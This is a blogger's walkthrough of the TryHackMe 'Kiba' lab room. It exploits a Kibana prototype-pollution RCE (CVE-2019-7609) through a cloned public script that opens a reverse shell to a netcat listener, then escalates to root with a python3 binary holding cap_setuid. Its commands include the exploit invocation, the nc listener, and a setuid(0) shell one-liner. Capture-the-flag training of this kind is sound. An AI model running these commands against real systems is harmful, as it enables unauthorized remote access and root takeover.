The skills to be tested and needed to solve this room are: rustscan, CVE, capabilities, privilege escalation, reverse-shell, and nc (netcat).
This room was released today 8/28/2020, and I wanted to try if I can crack it. It took me less than 30 minutes to retrieve the root flag. This is also the first time I’ve exploited linux capabilities to do privilege escalation.
I also chose to mask part of the answers so you will have to do the steps I took and see how things work. I don’t want to take away this learning experience from you.
Shoutout to the room creator, @stuxnet. You can access the room at https://tryhackme.com/room/kiba
I was assigned a victim IP address of 10.10.245.225 to attack. You will be assigned a different IP address, so double check your entries when following this walk-through.
There are seven questions to answer to complete this room:
- What is the vulnerability that is specific to programming languages with prototype-based inheritance?
- P******** P********
2. What is the version of visualization dashboard installed in the server?
- 6.*.*
3. What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000
- CVE-****-****
4. Compromise the machine and locate user.txt:
- THM{1*_****_*****_******_****_**e}
5. Capabilities is a concept that provides a security system that allows “divide” root privileges into different values:
- No answer needed
6. How would you recursively list all of these capabilities?
- g***** ** *
7. Escalate privileges and obtain root.txt
- THM{p********_**********_*****_*********s}
Steps:
- Google “vulnerability that is specific to programming languages with prototype-based inheritance”
2. Scan the victim IP address using rustscan. Type rustscan -b 500 10.10.245.225
3. Open a browser and type: 10.10.245.225:5601
4. Go to Management to see the version of the visualization software:
5. Google search for “Kibana CVE”
6. Download the exploit script here. Type: sudo git clone https://github.com/LandGrey/CVE-2019-7609.git
7. Set up a listener on your attack machine for a reverse-shell connection. Type: nc -nlvp 9999
8. Run the exploit that we just downloaded. Type: python CVE-2019-7609-kibana-rce.py -u http://10.10.245.225:5601 -host 10.2.*.* -port 9999 –shell
- -u http://10.10.245.225:5601 – is the target URL
- -host 10.2*.* – this is the remote host for the reverse shell. Use the IP address of your network adapter tun0
- -port 9999 – this can be any port that you want to use for your listener
- –shell – this is to initiate a reverse shell
9. Go to the listener we set up on our attack machine to verify connection:
10. Do a find for the user.txt. Type: find / -name user.txt 2>/dev/null
11. Open the file to retrieve the flag. Type: cat /home/kiba/user.txt
12. The questions 5 and 6 were talking about capabilities, so I am guessing that to escalate our privileges, we will have to exploit capabilities. I haven’t heard of capabilities before, so I went ahead and do sudo -l just to check if our current user has any sudo privileges
13. I did a quick Google search of “linux capabilities.” To check what capabilities are already existing on the victim machine, type: getcap -r / 2>/dev/null. I again added the 2>/dev/null to weed the permission errors from showing up as part of the search results:
- Here’s a quick glimpse of what the capabilities codes can do:
14. If we go back to the image on Step 13, the file /home/kiba/.hackmeplease/python3 has a capability name of cap_setuid+ep. And the image above says that cap_setuid “allow changing of the UID”. And if we look at the python3 file, it says that the owner of the file is user root. Meaning we, as user kiba can change our UID to “0”, which is root.
15. Time to exploit the file with capabilities and change user kiba’s UID to root. Type: ./python3 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’
16. Find the root flag by again typing: find / -name root.txt 2>/dev/null
17. Open the file root.txt by typing cat /root/root.txt
Hope you enjoyed and learned something new. Pleas subscribe to my blog to get updates for new contents.
N00b_H@ck3r 